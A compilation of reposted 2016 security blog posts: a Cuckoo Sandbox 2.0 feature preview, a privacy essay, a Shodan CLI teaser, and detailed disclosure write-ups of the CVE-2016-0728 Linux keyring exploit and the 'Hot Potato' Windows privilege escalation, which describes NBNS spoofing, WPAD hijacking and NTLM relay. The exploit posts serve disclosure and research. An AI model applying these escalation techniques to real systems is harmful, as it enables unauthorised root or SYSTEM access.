Cuckoo Droid is based on running the Android emulator through adb (and therefore also supports running analyses on actual/native Android devices!) and intercepts behavior from samples by hooking into the Dalvik/Java runtime. To perform this interception a monitor, Droidmon, has been developed which, through the usage of the eXposed framework is loaded into every new Application, where it will overwrite and log various Java functions.
Quite a few functions are intercepted and more can be added by simply adding some new entries to the following JSON file.
As a majority of our users is especially interested in generated network traffic (think CERT/IR teams) we could not miss out on the opportunity of integrating Suricata, Snort, and Moloch for PCAP analysis. (Note that Will Metcalf had already integrated Suricata and Moloch support in his Cuckoo fork a while back, but here we are as well).
Following we see the Suricata output in Cuckoo from a PCAP that we have imported manually from Malware Analysis Traffic. As can be seen there are a couple of Exploit Kit related alerts.
Now in order to determine whether we have seen any of these Suricata Signatures (note that SID is the Suricata ID for the rule that matched), IP addresses, or domain names (if you go their respective tab), we can simply click on their hyperlink which will take us to the Moloch web interface where Cuckoo will automatically perform a query so to only match the exact criteria we are interested in.
Within seconds one will be able to see other Cuckoo analyses which matched the given IP address / domain name / SID / etc. Note that Moloch is not only able to process PCAP files but can also be used to capture the traffic of an entire company (which is actually its main purpose), so the searching capabilities with Moloch are endless. As one community project to another we also took the opportunity of reporting a remote stack buffer overflow, a couple of cross side scripting vulnerabilities, and some out-of-bounds read crashes in the Moloch project, improving the stability of Moloch and thus also the Cuckoo users who use Moloch, more information can be found in this commit.
We would show Snort output as well, but unlike Suricata, where you can quickly analyze a PCAP through their unix socket support, it is required to run Snort separately for each PCAP analysis, making it a CPU intensive process to do so (taking up to 30 seconds for one processor at 100% usage – for your information this is more than the CPU performance required for doing the actual analysis in a VM).
Finally it should be noted that the usability of both Suricata and Snort is based entirely on their ruleset. Fortunately Emerging Threats (in their signatures referred to as ET as can be seen in the Suricata screenshot) provides tens of thousands of rules for free. Many of these do not really apply for our use-case, but there is definitely a gold mine of free information up for grabs that we take advantage of here 🙂
Continuing further on the network part of this blogpost there have been quite some interesting developments regarding HTTP/HTTPS traffic. Namely, as Cuckoo has been doing for over half a year now, it is able to extract TLS Master Secrets. Put in layman terms; by intercepting the encryption keys for TLS traffic we are effectively able to decrypt HTTPS traffic. As can be read in the TLS Master Secrets blogpost a file called tlsmaster.txt will be created for each analysis which, when loaded with its associated PCAP in Wireshark, will decrypt HTTPS traffic.
One notable fact about our approach is that it intercepts TLS in a transparent way. We do not require to install a certificate on the VM in order to decrypt traffic – we only require the ability to extract the TLS Master Secrets and obviously we require the PCAP file which we cross-reference with the encryption keys. HTTPS decryption in Cuckoo Sandbox works with Certificate Pinning enabled applications. (Just as with any other generic approach it does not support TLS interception of applications that ship their own SSL/TLS library statically).
After our users have been struggling with network routing in Cuckoo for about five years now it was time for us to step up our game. Easily said and with some help from Erik Kooijstra and n3sfox we made quick progress. Through a couple of simple configuration options one can define a defaultdirty line, one or more VPNs, and in a next release it will be possible to route to services such as FakeNet and InetSim as well. Keep in mind that this functionality is currently only supported on Ubuntu/Debian and that it is required to run an extra script shipped with Cuckoo as root – this script will run specific commands as commanded by Cuckoo (all of this so Cuckoo can be ran as non-root as we recommend).
While late in delivery to you all, Christmas Doge brought us this nifty new feature:
While in the process of getting more accurate and actionable data we have also been putting in a fair bit of work on improving and adding new Signatures. With a special thanks to RedSocks, who contributed over 200 new Signatures, we are now running over 300 Signatures on each analysis.
You can download them with:
cuckoo $ /utils/community.py -waf
In addition to that we have implemented a basic maliciousness score to each report to quantify an average level of suspiciousness derived from the identified patterns in the available signatures. Do note that a low score does not indicate a benign sample per se, but that a higher score definitely does indicate potential malware. In fact, from our perspective, a malicious sample with a low score is more interesting than a sample with score 6 to 10, as we know right away that is malicious.
In the following screenshots we are looking at a Poweliks sample – a sample performing so well in our sandbox that it scores more than 10 out of 10 points.
Our list of TODO items is virtually never ending, but usually when users or potential contributors reach out with specific feature requests or suggestions, we try to prioritize them. Thanks to Bart Mauritz and Joshua Beens, who made a Proof of Concept on the creation of baseline captures for each VM, Cuckoo is now able to differentiate between the Volatility results captured after an analysis and the Volatility results captured without any analysis at all.
The baseline processing module will pretty much subtract the two different Volatility result sets from each other resulting in a quick overview of the new Volatility results after the analysis and results that are no longer present after the analysis. As an example, one will be quickly able to see which services got stopped, which kernel drivers were added, etc.
In the following screenshot we are looking at the baseline difference of an analysis to http://www.google.com/. Now there is nothing special about that, but it does show that some random Yahoo-related processes disappeared, some other random search processes were started, and that pythonw.exe was started as well. This last pythonw is started – and running until the end – in order to guide the analysis as it progresses. More notably there are no new Internet Explorer processes in the difference, this can be explained by the fact that Internet Explorer was closed/terminated before the end of the analysis, and thus does not show up in the Volatility results.
For a while we have supported Yara rules – and we are still supporting Yara rules. But sometimes it is good enough to simply extract URLs from a memory dump, some dropped files, or simply the submitted binary. This has already helped us facilitate and systematize the extraction of Command & Control information from a number of malware families. You can expect some more automation on this regard coming in future releases.
To conclude this features preview, we come to one that has been long requested by many of our users. In some circumstances, especially in the case of malware designed to spread and target corporate networks, the sample might attempt to scan, indetify, and spread through additional servers available in the local network. Or for example, it might try to access and collect resources from nearby services. From this version, Cuckoo is able to run one or more Virtual Machines next to your standard analysis Virtual Machine in order to mimic a somewhat more realistic and juicy environment.
This functionality is in a very primitive stage, but we are looking forward to supporting some more realistic honeypot scenarios. At the moment it is be possible to start one or more VMs to host services such as vulnerable HTTP, SMTP, and FTP servers, but in the future we are looking to properly support Active Directory servers, in order to replicate a realistic corporate environment.
The length of this blog post is just a reflection of the size of the upcoming Cuckoo Sandbox 2.0 release. We are very excited about it, we invested a lot of time and effort in bringing it to you, and we are hopeful that you will welcome these recent developments with as much excitement.
We are looking forward to your feedback, bug finds, features requests, and we welcome everybody in our IRC channel (#cuckoosandbox on FreeNode) to discuss with us about the future of this project.
In case you missed it, we also launched our new Community platform. We completely replaced the previous site with a new software, therefore the old content is momentarily missing. We will try to migrate it and restore it in the future.
For the moment, that is all from us. We hope you will enjoy this release.
Original Post: https://cuckoosandbox.org/2016-01-21-cuckoo-sandbox-20-rc1.html
The Perception Point Research team has identified a 0-day local privilege escalation vulnerability in the Linux kernel. While the vulnerability has existed since 2012, our team discovered the vulnerability only recently, disclosed the details to the Kernel security team, and later developed a proof-of-concept exploit. As of the date of disclosure, this vulnerability has implications for approximately tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets). While neither us nor the Kernel security team have observed any exploit targeting this vulnerability in the wild, we recommend that security teams examine potentially affected devices and implement patches as soon as possible.
In this write-up, we’ll discuss the technical details of the vulnerability as well as the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided successfully escalates privileges from a local user to root.
CVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details, let’s cover some background required to understand the bug.
Quoting directly from its manpage, the keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel. System call interfaces – keyctl syscall (there are two other syscalls that are used for handling keys: add_key and request_key. keyctl, however, is definitely the most important one for this write-up.) are provided so that userspace programs can manage those objects and use the facility for their own purposes.
Each process can create a keyring for the current session usingkeyctl(KEYCTL_JOIN_SESSION_KEYRING, name) and can choose to either assign a name to the keyring or not by passing NULL. The keyring object can be shared between processes by referencing the same keyring name. If a process already has a session keyring, this same system call will replace its keyring with a new one. If an object is shared between processes, the object’s internal refcount, stored in a field called usage, is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As we see in the next code snippet, taken from kernel version 3.18, the execution jumps to error2 label which skips the call tokey_put and leaks the reference that was increased by find_keyring_by_name.
Triggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:
which results the following output having leaked-keyring 100 references:
Even though the bug itself can directly cause a memory leak, it has far more serious consequences. After a quick examination of the relevant code flow, we found that the usage field used to store the reference count for the object is of type atomic_t, which under the hood, is basically an int – meaning 32-bit on both 32-bit and 64-bit architectures. While every integer is theoretically possible to overflow, this particular observation makes practical exploitation of this bug as a way to overflow the reference count seem feasible. And it turns out no checks are performed to prevent overflowing the usage field from wrapping around to 0.
If a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free the object. If the same process holds another legitimate reference and uses it after the kernel freed the object, it will cause the kernel to reference deallocated, or a reallocated memory. This way, we can achieve a use-after-free, by using the exact same bug from before. A lot has been written on use-after-free vulnerability exploitation in the kernel, so the following steps wouldn’t surprise an experienced vulnerability researcher. The outline of the steps that to be executed by the exploit code is as follows:
Step 1 is completely out of the manpage, step 2 was explained earlier. Let’s dive into the technical details of the rest of the steps.
This step is actually an extension of the bug. The usage field is of int type which means it has a max value of 2^32 both on 32-bit and 64-bit architectures. To overflow the usage field we have to loop the snippet above 2^32 times to get usage to zero.
There are a couple of ways to get the keyring object freed while holding a reference to it. One possible way is using one process to overflow the keyring usage field to 0 and getting the object freed by the Garbage Collection algorithm inside the keyring subsystem which frees any keyring object the moment the usage counter is 0.
One caveat though, if we look at the join_session_keyring function prepare_creds also increments the current session keyring and abort_creds or commit_creds decrements it respectively. The problem is that abort_creds doesn’t decrement the keyring’s usage field synchronically but it is called later using rcu job, which means we can overflow the usage counter without knowing it was overflowed. It is possible to solve this issue by using sleep(1) after each call to join_session_keyring, of course it is not feasible to sleep(2^32) seconds. A feasible work around will be to use a variation of the divide-and-conquer algorithm and to sleep after 2^31-1 calls, then after 2^30-1 etc… this way we never overflow unintentionally because the maximum value of refcount can be double the value it should be if no jobs where called.
Having our process point to a freed keyring object, now we need to allocate a kernel object that will override the freed keyring object. That will be easy thanks to how SLAB memory works, allocating many objects of the keyring size just after the object is freed. We choose to use the Linux IPC subsystem to send messages of size 0xb8 – 0x30 when 0xb8 is the size of the keyring object and 0x30 is the size of a message header.
This way we control the lower 0x88 bytes of the keyring object.
From here it’s pretty easy thanks to the struct key_type inside the keyring object which contains many function pointers. An interesting function pointer is the revoke function pointer which can be invoked using the keyctl(KEY_REVOKE, key_name) syscall. The following is the Linux kernel snippet calling the revoke function:
The keyring object should be filled as follows:
The uid and flags attributes should be filled that way to pass a few control check until the execution gets to key->type->revoke. The type field should point to a user-space struct containing the function pointers with revoke pointing to a function that will be executed with root privileges. Here is a code snippet that demonstrates this.
Addresses of commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version/android device.
Now the last step is of course:
here is a link to the full exploit which runs on kernel 3.18 64-bit, following is the output of running the full exploit which takes about 30 minutes to run on Intel Core i7-5500 CPU (Usually time is not an issue in a privilege escalation exploit):
The vulnerability affects any Linux Kernel version 3.8 and higher. SMEP & SMAP will make it difficult to exploit as well as SELinux on android devices. Maybe we’ll talk about tricks to bypass those mitigation in upcoming blogs, anyway the most important thing for now is to patch it as soon as you can.
Thanks to David Howells, Wade Mealing and the whole Red Hat Security team for that fast response and the cooperation fixing the bug.
Perception Point Research Team
Original Post: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
The premise of this post is simple: If you are watching/viewing porn online in 2015, even in Incognito mode, you should expect that at some point your porn viewing history will be publicly released and attached to your name.
This is an uncomfortable topic to talk/write about, which perhaps contributes to how we’ve arrived at the current state. So, to understand the threat, start with some technical considerations:
If a malicious party obtained identifiable access logs for just one of the websites that know your name, and view logs for just one of the adult websites you’ve visited, it could infer with very high probability – beyond plausible deniability – a list of porn you’ve viewed. At any time, somebody could post a website that allows you to search anybody by email or facebook username and view their porn browsing history. All that’s needed are two nominal data breaches and an enterprising teenager that wants to create havoc.
In 2014 a set of celebrities had naked photos released to the public, a deeply disturbing event that was fantastically labeled “the fappening”. Many people brushed off the episode – oh well, I’m not a celebrity. But I think the next big internet privacy crisis could expose the private and potentially embarrassing personal data of regular people to their neighbors – perhaps as described here, perhaps in a different form. I worry about the policy measures that could be hastily enacted in response to such an event – yet another reason that the tech community should take a more proactive approach ensuring data privacy.
Original Post: http://brettpthomas.com/online-porn-could-be-the-next-big-privacy-scandal.html
Using Shodan from the Command-Line
Have you ever needed to write a quick script to download data from Shodan? Or setup a cronjob to check what Shodan found on your network recently? How about getting a list of IPs out of the Shodan API? For the times where you’d like to have easy script-friendly access to Shodan there’s now a new command-line tool appropriately called shodan.
The shodan command-line interface (CLI) is packaged with the official Python library for Shodan, which means if you’re running the latest version of the library you already have access to the CLI. To install the new tool in Linux simply execute:
Or if you’re running an older version of the Shodan Python library and want to upgrade:
Once the tool is installed, you have to initialize the environment with your API key using shodan init:
At the moment, the shodan CLI supports 6 commands. Note…
View original post 430 more words
Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
If this sounds vaguely familiar, it’s because a similar technique was disclosed by the guys at Google Project Zero – https://code.google.com/p/google-security-research/issues/detail?id=222 . In fact, some of our code was shamelessly borrowed from their PoC and expanded upon.
Using this technique, we can elevate our privilege on a Windows workstation from the lowest levels to “NT AUTHORITY\SYSTEM” – the highest level of privilege available on a Windows machine.
This is important because many organizations unfortunately rely on Windows account privileges to protect their corporate network. Often it is the case that once an attacker is able to gain high privileged access to ANY workstation or server on a Windows network, they can use this access to gain “lateral movement” and compromise other hosts on the same domain. As an attacker, we often gain access to a computer through a low privilege user or service account. Gaining high privilege access on a host is often a critical step in a penetration test, and is usually performed in an ad-hoc manner as there are no known public exploits or techniques to do so reliably.
The techniques that this exploit uses to gain privilege escalation aren’t new, but the way they are combined is. Microsoft is aware of all of these issues and has been for some time (circa 2000). These are unfortunately hard to fix without breaking backward compatibility and have been leveraged by attackers for over 15 years.
The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches. Each part corresponds to an already well known attack that has been in use for years:
NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments. When you (or Windows) perform a DNS lookup, first Windows will check the “hosts” file. If no entry exists, it will then attempt a DNS lookup. If this fails, an NBNS lookup will be performed. The NBNS protocol basically just asks all hosts on the local broadcast domain “Who knows the IP address for host XXX?”. Any host on the network is free to respond however they wish.
In penetration testing, we often sniff network traffic and respond to NBNS queries observed on a local network. We will impersonate all hosts, replying to every request with our IP address in hopes that the resulting connection will do something interesting, like try to authenticate.
For privilege escalation purposes, we can’t assume that we are able to sniff network traffic. Why? Because this requires local administrator access. So how can we accomplish NBNS spoofing?
If we can know ahead of time which hostname a target machine (in this case our target is 127.0.0.1) will be sending an NBNS query for, we can craft a fake response and flood the target host with NBNS responses very quickly (since it is a UDP protocol). One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response, and we are unable to see the request. We can overcome this by flooding quickly and iterating over all 65536 possible values.
What if the network we are targeting has a DNS record for the host we want to spoof? We can use a technique called UDP port exhaustion to force ALL DNS lookups on the system to fail. All we do is bind to EVERY single UDP port. This causes DNS to fail because there will be no available UDP source port for the request. When DNS fails, NBNS will be the fallback.
In testing, this has proved to be 100% effective due to the speed we are able to send UDP packets to 127.0.0.1.
In Windows, Internet Explorer by default will automatically try to detect network proxy setting configuration by accessing the URL “http://wpad/wpad.dat”. This also surprisingly applies to some Windows services such as Windows Update, but exactly how and under what conditions seems to be version dependent.
Of course the URL “http://wpad/wpad.dat” wont exist on all networks because the hostname “wpad” wont necessarily exist in the DNS nameserver. However as we saw above, we can spoof host names using NBNS spoofing.
With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host “WPAD”, or “WPAD.DOMAIN.TLD”, and we say that the WPAD host has IP address 127.0.0.1.
At the same time, we run an HTTP server locally on 127.0.0.1. When it receives a request for “http://wpad/wpad.dat”, it responds with something like the following:
This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1.
Interestingly, this attack when performed by even a low privilege user will affect all users of the machine. This includes administrators and system accounts. The following screenshot shows two users simultaneously logged into the same machine, the low privilege user is performing local NBNS spoofing, the high privilege user is affected in the second screenshot.
NTLM relay is a well known, but often misunderstood attack against Windows NTLM authentication. The NTLM protocol is vulnerable to man-in-the-middle attacks. If an attacker can trick a user into trying to authenticate using NTLM to his machine, he can relay that authentication attempt to another machine!
The old version of this attack had the victim attempting to authenticate to the attacker using the SMB protocol with NTLM authentication. The attacker would then relay those credentials back to the victim’s computer and gain remote access using a “psexec” like technique.
Microsoft patched this by disallowing same-protocol NTLM authentication using a challenge that is already in flight. What this means is that SMB->SMB NTLM relay from one host back to itself will no longer work. However cross-protocol attacks such as HTTP->SMB will still work with no issue!
With all HTTP traffic now presumably flowing through an HTTP server that we control, we can do things like redirect them somewhere that will request NTLM authentication.
In the Potato exploit, all HTTP requests are redirected with a 302 redirect to “http://localhost/GETHASHESxxxxx”, where xxxxx is some unique identifier. Requests to “http://localhost/GETHASHESxxxxx” respond with a 401 request for NTLM authentication.
Any NTLM credentials are then relayed to the local SMB listener to create a new system service that runs a user-defined command.
When the HTTP request in question originates from a high privilege account, for example, when it is a request from the Windows Update service, this command will run with “NT AUTHORITY\SYSTEM” privilege!
Usage is currently operating system dependent.
It is also a bit flaky sometimes, due to the quirks in how Windows handles proxy settings and the WPAD file. Often when the exploit doesn’t work, it is required to leave it running and wait. When Windows already has a cached entry for WPAD, or is allowing direct internet access because no WPAD was found, it could take 30-60 minutes for it to refresh the WPAD file. It is necessary to leave the exploit running and try to trigger it again later, after this time has elapsed.
The techniques listed here are ordered from least to most complex. Any technique later in the list should work on all versions previous. Videos and screenshots are included for each.
Windows 7 can be fairly reliably exploited through the Windows Defender update mechanism.
Potato.exe has code to automatically trigger this. Simply run the following:
This will spin up the NBNS spoofer, spoof “WPAD” to 127.0.0.1, then check for Windows Defender updates.
If your network has a DNS entry for “WPAD” already, you can try “-disable_exhaust false”. This should cause the DNS lookup to fail and it should fallback to NBNS. This seems to work pretty reliably on Windows 7.
Since Windows Server doesn’t come with Defender, we need an alternate method. Instead we’ll simply check for Windows updates. The other caveat is that, at least on my domain, Server 2K8 wanted WPAD.DOMAIN.TLD instead of just WPAD. The following is an example usage:
After this runs successfully, simply check for Windows updates. If it doesn’t trigger, wait about 30m with the exploit running and check again. If it still doesn’t work, try actually downloading an update.
If your network has a DNS entry for “WPAD” already, you can try “-disable_exhaust false”, however it might break things here. Doing DNS port exhaustion causes ALL DNS lookups to fail. The Windows Update process may need to do a few DNS lookups before reaching out for WPAD. You would have to nail the timing JUST right to get it working in this case.
In the newest versions of Windows, it appears that Windows Update may no longer respect the proxy settings set in “Internet Options”, or check for WPAD. Instead proxy settings for Windows Update are controlled using “netsh winhttp proxy…”
Instead for these versions, we rely on a newer feature of Windows, the “automatic updater of untrusted certificates”. Details can be found https://support.microsoft.com/en-us/kb/2677070 andhttps://technet.microsoft.com/en-us/library/dn265983.aspx
From the technet article “The Windows Server 2012 R2, Windows Server 2012, Windows 8.1, and Windows 8 operating systems include an automatic update mechanism that downloads certificate trust lists (CTLs) on a daily basis.”
It appears that this part of Windows still uses WPAD, even when the winhttp proxy setting is set to direct. Why is a bit of a mystery…
In this case the usage of Potato is as follows:
At this point, you will need to wait up to 24hrs or find another way to trigger this update.
If your network has a DNS entry for “WPAD” already, refer to the documentation for this situation in Server 2008. You can try port exhaustion but it might be tricky.
It’s unclear whether this attack would work when SMB signing is enabled. The exploit as released currently does not, but this may just be due to lack of SMB signing support in the CIFS library we’re using. My reason to suspect that it may work is that everything is happening on 127.0.0.1. If the signatures are host based, they may still match?
Let’s think back to our NBNS spoofing attack.
Using the same technique of brute-forcing the TXID, we could technically perform NBNS spoofing attacks outside of our local network. In fact, in theory, as long as there is a fast enough connection to support it, we should be able to perform NBNS spoofing attacks against ANY Windows hosts for which we can talk to UDP port 137.
This actually appears to work in practice, at least on local network, I’ve yet to successfully try it over the Internet.
We’re releasing a modified version of the “Responder.py” tool that performs this attack. The following video demonstrates the attack on a network laid out as follows:
Those interested in trying this out themselves or building upon it can find all of the code on our GitHub page: https://github.com/foxglovesec/Potato
Original Post: http://foxglovesecurity.com/2016/01/16/hot-potato/